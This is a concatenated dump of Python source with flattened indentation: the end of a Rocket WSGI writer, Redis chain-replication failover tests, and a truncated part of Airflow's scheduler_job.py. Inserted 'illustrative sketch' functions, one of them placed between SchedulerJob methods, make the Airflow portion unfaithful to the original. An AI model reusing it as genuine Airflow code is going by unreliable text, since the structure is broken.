h_set['Content-Length'] = str(self.size)
else:
# If they sent us more than one section, we blow chunks
h_set['Transfer-Encoding'] = 'Chunked'
self.chunked = True
if __debug__:
self.err_log.debug('Adding header...'
'Transfer-Encoding: Chunked')
if 'Connection' not in h_set:
# If the application did not provide a connection header,
# fill it in
client_conn = self.environ.get('HTTP_CONNECTION', '').lower()
if self.environ['SERVER_PROTOCOL'] == 'HTTP/1.1':
# HTTP = 1.1 defaults to keep-alive connections
if client_conn:
h_set['Connection'] = client_conn
else:
h_set['Connection'] = 'keep-alive'
else:
# HTTP < 1.1 supports keep-alive but it's quirky
# so we don't support it
h_set['Connection'] = 'close'
# Close our connection if we need to.
self.closeConnection = h_set.get('Connection', '').lower() == 'close'
# Build our output headers
header_data = HEADER_RESPONSE % (self.status, str(h_set))
# Send the headers
if __debug__:
self.err_log.debug('Sending Headers: %s' % repr(header_data))
self.conn.sendall(b(header_data))
self.headers_sent = True
def write_warning(self, data, sections=None):
self.err_log.warning('WSGI app called write method directly. This is '
'deprecated behavior. Please update your app.')
return self.write(data, sections)
def write(self, data, sections=None):
""" Write the data to the output socket. """
if self.error[0]:
self.status = self.error[0]
data = b(self.error[1])
if not self.headers_sent:
self.send_headers(data, sections)
if self.request_method != 'HEAD':
try:
if self.chunked:
self.conn.sendall(b('%x\r\n%s\r\n' % (len(data), data)))
else:
self.conn.sendall(data)
except socket.timeout:
self.closeConnection = True
except socket.error:
# But some clients will close the connection before that
# resulting in a socket error.
self.closeConnection = True
def start_response(self, status, response_headers, exc_info=None):
""" Store the HTTP status and headers to be sent when self.write is
called. """
if exc_info:
try:
if self.headers_sent:
# Re-raise original exception if headers sent
# because this violates WSGI specification.
raise
finally:
exc_info = None
elif self.header_set:
raise AssertionError("Headers already set!")
if PY3K and not isinstance(status, str):
self.status = str(status, 'ISO-8859-1')
else:
self.status = status
# Make sure headers are bytes objects
try:
self.header_set = Headers(response_headers)
except UnicodeDecodeError:
self.error = ('500 Internal Server Error',
'HTTP Headers should be bytes')
self.err_log.error('Received HTTP Headers from client that contain'
' invalid characters for Latin-1 encoding.')
return self.write_warning
def run_app(self, conn):
self.size = 0
self.header_set = Headers([])
self.headers_sent = False
self.error = (None, None)
self.chunked = False
sections = None
output = None
if __debug__:
self.err_log.debug('Getting sock_file')
# Build our file-like object
if PY3K:
sock_file = conn.makefile(mode='rb', buffering=BUF_SIZE)
else:
sock_file = conn.makefile(BUF_SIZE)
try:
# Read the headers and build our WSGI environment
self.environ = environ = self.build_environ(sock_file, conn)
# Handle 100 Continue
if environ.get('HTTP_EXPECT', '') == '100-continue':
res = environ['SERVER_PROTOCOL'] + ' 100 Continue\r\n\r\n'
conn.sendall(b(res))
# Send it to our WSGI application
output = self.app(environ, self.start_response)
if not hasattr(output, '__len__') and not hasattr(output, '__iter__'):
self.error = ('500 Internal Server Error',
'WSGI applications must return a list or '
'generator type.')
if hasattr(output, '__len__'):
sections = len(output)
for data in output:
# Don't send headers until body appears
if data:
self.write(data, sections)
if not self.headers_sent:
# Send headers if the body was empty
self.send_headers('', sections)
if self.chunked and self.request_method != 'HEAD':
# If chunked, send our final chunk length
self.conn.sendall(b('0\r\n\r\n'))
# Don't capture exceptions here. The Worker class handles
# them appropriately.
finally:
if __debug__:
self.err_log.debug('Finally closing output and sock_file')
if hasattr(output, 'close'):
output.close()
sock_file.close()
# Monolithic build...end of module: rocket/methods/wsgi.py
demo.py
import multiprocessing
import time
import numpy as np
import redis
from tests import common
from tests.common import *
ack_client = AckClient()
master_client = MasterClient()
head_client = GetHeadFromMaster(master_client)
act_pubsub = None
# Put() ops can be ignored when failures occur on the servers. Try a few times.
fails_since_last_success = 0
max_fails = 3
ops_completed = multiprocessing.Value('i', 0)
# From redis-py/.../test_pubsub.py.
def wait_for_message(pubsub, timeout=0.1, ignore_subscribe_messages=False):
now = time.time()
timeout = now + timeout
while now < timeout:
message = pubsub.get_message(
ignore_subscribe_messages=ignore_subscribe_messages)
if message is not None:
return message
time.sleep(1e-5) # 10us.
now = time.time()
return None
def Put(i):
global head_client
global ack_pubsub
global fails_since_last_success
i_str = str(i) # Serialize it once.
put_issued = False
for k in range(3): # Try 3 times.
try:
sn = head_client.execute_command("MEMBER.PUT", i_str, i_str)
put_issued = True
break
except redis.exceptions.ConnectionError:
head_client = RefreshHeadFromMaster(master_client) # Blocking.
continue
if not put_issued:
raise Exception("Irrecoverable redis connection issue; put client %s" %
head_client)
# Wait for the ack.
ack = None
good_client = False
for k in range(3): # Try 3 times.
try:
# if k > 0:
# print('k %d pubsub %s' % (k, ack_pubsub.connection))
# NOTE(zongheng): 1e-4 seems insufficient for an ACK to be
# delivered back. 1e-3 has the issue of triggering a retry, but
# then receives an ACK for the old sn (an issue clients will need
# to address). Using 10ms for now.
ack = wait_for_message(ack_pubsub, timeout=1e-2)
good_client = True
break
except redis.exceptions.ConnectionError as e:
_, ack_pubsub = RefreshTailFromMaster(master_client) # Blocking.
continue
if not good_client:
raise Exception("Irrecoverable redis connection issue; ack client %s" %
ack_pubsub.connection)
elif ack is None:
# Connected but an ACK was not received after timeout (the update was
# likely ignored by the store). Retry.
fails_since_last_success += 1
if fails_since_last_success >= max_fails:
raise Exception(
"A maximum of %d update attempts have failed; "
"no acks from the store are received. i = %d, client = %s" %
(max_fails, i, ack_pubsub.connection))
_, ack_pubsub = RefreshTailFromMaster(master_client)
print("%d updates have been ignored since last success, "
"retrying Put(%d) with fresh ack client %s" %
(fails_since_last_success, i, ack_pubsub.connection))
time.sleep(1)
Put(i)
else:
# TODO(zongheng): this is a stringent check. See NOTE above: sometimes
# we can receive an old ACK.
assert int(ack["data"]) == sn
fails_since_last_success = 0
def SeqPut(n, sleep_secs):
"""For i in range(n), sequentially put i->i into redis."""
global ack_client
global ack_pubsub
global ops_completed
ack_client, ack_pubsub = AckClientAndPubsub()
ops_completed.value = 0
latencies = []
for i in range(n):
# if i % 50 == 0:
# print('i = %d' % i)
start = time.time()
Put(i) # i -> i
latencies.append((time.time() - start) * 1e6) # Microsecs.
time.sleep(sleep_secs)
ops_completed.value += 1 # No lock needed.
nums = np.asarray(latencies)
print(
'throughput %.1f writes/sec; latency (us): mean %.5f std %.5f num %d' %
(len(nums) * 1.0 / np.sum(nums) * 1e6, np.mean(nums), np.std(nums),
len(nums)))
# Asserts that the redis state is exactly {i -> i | i in [0, n)}.
def Check(n):
read_client, _ = RefreshTailFromMaster(master_client)
actual = len(read_client.keys(b'*'))
assert actual == n, "Written %d Expected %d" % (actual, n)
for i in range(n):
data = read_client.get(str(i))
assert int(data) == i, i
def test_demo():
# Launch driver thread.
n = 1000
sleep_secs = 0.01
driver = multiprocessing.Process(target=SeqPut, args=(n, sleep_secs))
driver.start()
# Kill / add.
new_nodes = []
time.sleep(0.1)
common.KillNode(index=1)
new_nodes.append(common.AddNode(master_client))
driver.join()
assert ops_completed.value == n
chain = master_client.execute_command('MASTER.GET_CHAIN')
chain = [s.split(b':')[-1] for s in chain]
assert chain == [b'6370', b'6372'], 'chain %s' % chain
Check(ops_completed.value)
for proc, _ in new_nodes:
proc.kill()
print('Total ops %d, completed ops %d' % (n, ops_completed.value))
def test_kaa():
"""Kill, add, add."""
# Launch driver thread.
n = 1000
sleep_secs = 0.01
driver = multiprocessing.Process(target=SeqPut, args=(n, sleep_secs))
driver.start()
new_nodes = []
time.sleep(0.1)
common.KillNode(index=1)
new_nodes.append(common.AddNode(master_client))
new_nodes.append(common.AddNode(master_client))
driver.join()
assert ops_completed.value == n
chain = master_client.execute_command('MASTER.GET_CHAIN')
assert len(chain) == 2 - 1 + len(new_nodes), 'chain %s' % chain
Check(ops_completed.value)
for proc, _ in new_nodes:
proc.kill()
def test_multi_kill_add():
"""Kill, add a few times."""
# Launch driver thread.
n = 1000
sleep_secs = 0.01
driver = multiprocessing.Process(target=SeqPut, args=(n, sleep_secs))
driver.start()
# Kill / add.
new_nodes = []
time.sleep(0.1)
common.KillNode(index=1) # 6371 dead
new_nodes.append(common.AddNode(master_client)) # 6372
common.KillNode(index=1) # 6372 dead
new_nodes.append(common.AddNode(master_client)) # 6373
common.KillNode(index=0) # 6370 dead, now [6373]
new_nodes.append(common.AddNode(master_client)) # 6374
new_nodes.append(common.AddNode(master_client)) # 6375
# Now [6373, 6374, 6375].
common.KillNode(index=2) # 6375 dead, now [6373, 6374]
driver.join()
assert ops_completed.value == n
chain = master_client.execute_command('MASTER.GET_CHAIN')
chain = [s.split(b':')[-1] for s in chain]
assert chain == [b'6373', b'6374'], 'chain %s' % chain
Check(ops_completed.value)
for proc, _ in new_nodes:
proc.kill()
def test_dead_old_tail_when_adding():
    # We set "sleep_secs" to a higher value so that "kill tail" and "add node"
    # are triggered without a refresh request from the driver. The master will
    # have the following view of its members:
# init: [ live, live ]
# kill: [ live, dead ]
# - master not told node 1 is dead
# Tests that when adding, the master detects & removes the dead node first.
# Launch driver thread.
n = 5
sleep_secs = 1
driver = multiprocessing.Process(target=SeqPut, args=(n, sleep_secs))
driver.start()
time.sleep(0.1)
common.KillNode(index=1)
proc, _ = common.AddNode(master_client)
driver.join()
assert ops_completed.value == n
chain = master_client.execute_command('MASTER.GET_CHAIN')
assert len(chain) == 2 - 1 + 1, 'chain %s' % chain
Check(ops_completed.value)
proc.kill()
def BenchCredis(num_nodes, num_ops, num_clients):
common.Start(chain=common.MakeChain(num_nodes))
time.sleep(0.1)
# TODO(zongheng): ops_completed needs to be changed
assert num_clients == 1
drivers = []
for i in range(num_clients):
drivers.append(
multiprocessing.Process(target=SeqPut, args=(num_ops, 0)))
for driver in drivers:
driver.start()
for driver in drivers:
driver.join()
assert ops_completed.value == num_ops
Check(ops_completed.value)
def BenchVanillaRedis(num_ops):
common.Start(chain=common.MakeChain(1))
time.sleep(0.1)
r = AckClient() # Just use the chain node as a regular redis server.
start = time.time()
for i in range(num_ops):
i_str = str(i) # Serialize once.
r.execute_command('SET', i_str, i_str)
total_secs = time.time() - start
print('throughput %.1f writes/sec; latency (us): mean %.5f std ? num %d' %
(num_ops * 1.0 / total_secs, total_secs * 1e6 / num_ops, num_ops))
if __name__ == '__main__':
# BenchVanillaRedis(num_ops=100000)
BenchCredis(num_nodes=1, num_ops=500000, num_clients=1)
# BenchCredis(num_nodes=2, num_ops=1000000)
# BenchCredis(num_nodes=3, num_ops=100000)
scheduler_job.py
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from datetime import timedelta
from time import sleep
from past.builtins import basestring
import six
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow.configuration import conf
from airflow import executors, models, settings
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.jobs.base_job import BaseJob
from airflow.models import DagRun, SlaMiss, errors
from airflow.settings import Stats
from airflow.ti_deps.dep_context import DepContext, SCHEDULED_DEPS
from airflow.operators.dummy_operator import DummyOperator
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (AbstractDagFileProcessor,
DagFileProcessorAgent,
SimpleDag,
SimpleDagBag,
SimpleTaskInstance,
list_py_file_paths)
from airflow.utils.db import provide_session
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.state import State
class DagFileProcessor(AbstractDagFileProcessor, LoggingMixin, MultiprocessingStartMethodMixin):
"""Helps call SchedulerJob.process_file() in a separate process.
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: unicode
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: list[unicode]
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_ids, zombies):
self._file_path = file_path
        # The process that was launched to process the given file path.
self._process = None
self._dag_ids = dag_ids
self._pickle_dags = pickle_dags
self._zombies = zombies
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessor.class_creation_counter
DagFileProcessor.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_ids,
thread_name,
zombies):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: unicode
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[unicode]
:param thread_name: the name to use for the process that is launched
:type thread_name: unicode
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
stdout = StreamLogWriter(log, logging.INFO)
stderr = StreamLogWriter(log, logging.WARN)
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
sys.stdout = stdout
sys.stderr = stderr
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s",
os.getpid(), file_path)
scheduler_job = SchedulerJob(dag_ids=dag_ids, log=log)
result = scheduler_job.process_file(file_path,
zombies,
pickle_dags)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
if six.PY2:
context = multiprocessing
else:
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
self._parent_channel, _child_channel = context.Pipe()
self._process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
if six.PY2:
self._process.join(5)
else:
from contextlib import suppress
with suppress(TimeoutError):
self._process._popen.wait(5) # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
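# Illustrative sketch (not part of the Airflow source): the lifecycle a caller such
# as DagFileProcessorAgent drives a DagFileProcessor through.  The file path used
# here is hypothetical and assumes a working Airflow environment.
def _example_process_one_file():
    processor = DagFileProcessor(file_path='/tmp/example_dag.py',
                                 pickle_dags=False,
                                 dag_ids=[],
                                 zombies=[])
    processor.start()            # launch a child process that runs process_file()
    while not processor.done:    # poll until the child sends its result back
        time.sleep(0.1)
    return processor.result      # SimpleDags produced by SchedulerJob.process_file()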
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param run_duration: how long to run (in seconds) before exiting
:type run_duration: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs', fallback=-1),
processor_poll_interval=conf.getfloat(
'scheduler', 'processor_poll_interval', fallback=1),
run_duration=None,
do_pickle=False,
log=None,
*args, **kwargs):
"""
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self.run_duration = run_duration
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super(SchedulerJob, self).__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'parsing_processes')
if log:
self._log = log
self.using_sqlite = False
self.using_mysql = False
if conf.get('core', 'sql_alchemy_conn').lower().startswith('sqlite'):
self.using_sqlite = True
if conf.get('core', 'sql_alchemy_conn').lower().startswith('mysql'):
self.using_mysql = True
        self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
        self.processor_agent = None
        if run_duration is None:
            self.run_duration = conf.getint('scheduler',
                                            'run_duration')
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super(SchedulerJob, self).is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def manage_slas(self, dag, session=None):
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
# This is a temporary fix for 1.10.4 release.
# Background: AIRFLOW-4297
# TODO: refactor manage_slas() to handle related issues.
if dag.normalized_schedule_interval is None:
self.log.info("SLA check for DAGs with schedule_interval 'None'/'@once' are "
"skipped in 1.10.4, due to related refactoring going on.")
return
TI = models.TaskInstance
sq = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == sq.c.task_id,
TI.execution_date == sq.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas:
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
            <pre><code>{task_list}\n</code></pre>
Blocking tasks:
            <pre><code>{blocking_task_list}\n{bug}</code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.",
sla.task_id)
continue
tasks_missed_sla.append(task)
emails = set()
for task in tasks_missed_sla:
if task.email:
                if isinstance(task.email, six.string_types):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception:
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
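# --- Illustrative sketch (not the Airflow API) of the schedule-walking rule used in
# manage_slas above, with plain datetimes. `following_schedule` here is an assumed
# fixed-interval schedule; Airflow derives it from the DAG's cron or timedelta.
from collections import namedtuple
from datetime import datetime, timedelta
SlaMissRecord = namedtuple("SlaMissRecord", ["execution_date", "timestamp"])
def find_sla_misses(last_execution_date, schedule_interval, sla, now=None):
    """Return a record for every schedule period whose SLA deadline has already passed."""
    now = now or datetime.utcnow()
    def following_schedule(dttm):
        return dttm + schedule_interval
    misses = []
    dttm = following_schedule(last_execution_date)
    while dttm < now:
        if following_schedule(dttm) + sla < now:
            misses.append(SlaMissRecord(execution_date=dttm, timestamp=now))
        dttm = following_schedule(dttm)
    return misses
# Example: an hourly task with a 10 minute SLA that last succeeded 3 hours ago has
# blown the SLA for every period whose deadline is already in the past.
print(find_sla_misses(datetime.utcnow() - timedelta(hours=3),
                      timedelta(hours=1), timedelta(minutes=10)))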
@staticmethod
def update_import_errors(session, dagbag):
"""
        For the DAGs in the given DagBag, record any associated import errors and clear
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in six.iteritems(dagbag.import_errors):
session.add(errors.ImportError(
filename=filename,
timestamp=timezone.utcnow(),
stacktrace=stacktrace))
session.commit()
@provide_session
def create_dag_run(self, dag, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRun.ID_PREFIX + '%')
))
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
            # don't do scheduler catchup for DAGs that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now or isinstance(dag.schedule_interval, timedelta):
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
